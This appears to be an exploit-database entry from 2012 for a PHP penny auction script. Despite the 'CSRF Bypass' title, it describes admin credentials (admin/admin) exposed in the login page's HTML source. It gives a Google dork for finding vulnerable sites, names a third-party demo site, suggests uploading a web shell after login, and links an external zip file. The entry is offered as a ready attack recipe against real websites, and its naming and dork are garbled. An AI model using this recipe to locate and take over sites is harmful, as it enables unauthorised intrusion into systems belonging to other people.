Penny Auction Script CSRF Bypass (View Source) Vulnerability

2012-03-03T00:00:00
ID 1337DAY-ID-17612
Type zdt
Reporter alajman
Modified 2012-03-03T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            #Title: Auction CSRF Bypass (View Source) Vulnerability

#Author: hacker alajman  

#Mail : [email protected]

#Software Link : http://www.phppennyauction.com/  

#Version: 1.0

#Google Dork: inurl:static_page id=20 -''+++ 9:59am - Perigaum Parsifal Automatik / P-0504-STW - End price: $5.11 - Savings: 97%''
 
-------------------------- حط الثغره بعد هذي ------------

Auction

Exploit:


www.xxx.com/auction/admin.php

/auction/admin.php


Login

After Go to View Source

   <td><input class="input_120" name="username" value="admin"type="text" /></td>

  <td ><input class="input_120" name="password" value="admin"  type="password" /></td>

''value="admin"''
''value="admin"''

user :admin
pass:admin

And u can upload shall after login 

Youtube

http://www.youtube.com/watch?v=S-MsP6qwViQ&feature=player_embedded

Video 

http://www.root-alajman.com/hacker%20alajman.zip

##
Demo

http://www.bioborder.com/auction/admin.php



########################

#########Greetz: Hacker alajman / AnGer Hacker / G-B /#########



#  0day.today [2018-04-14]  #